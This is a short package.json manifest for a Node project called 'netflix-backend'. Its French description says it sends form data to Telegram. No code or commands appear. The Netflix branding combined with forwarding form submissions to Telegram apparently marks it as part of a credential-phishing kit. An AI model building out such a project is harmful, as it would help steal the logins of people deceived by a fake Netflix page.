{
  "name": "netflix-backend",
  "version": "1.0.0",
  "description": "Backend pour envoyer les données du formulaire à Telegram",
  "main": "api/send.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "dependencies": {}
}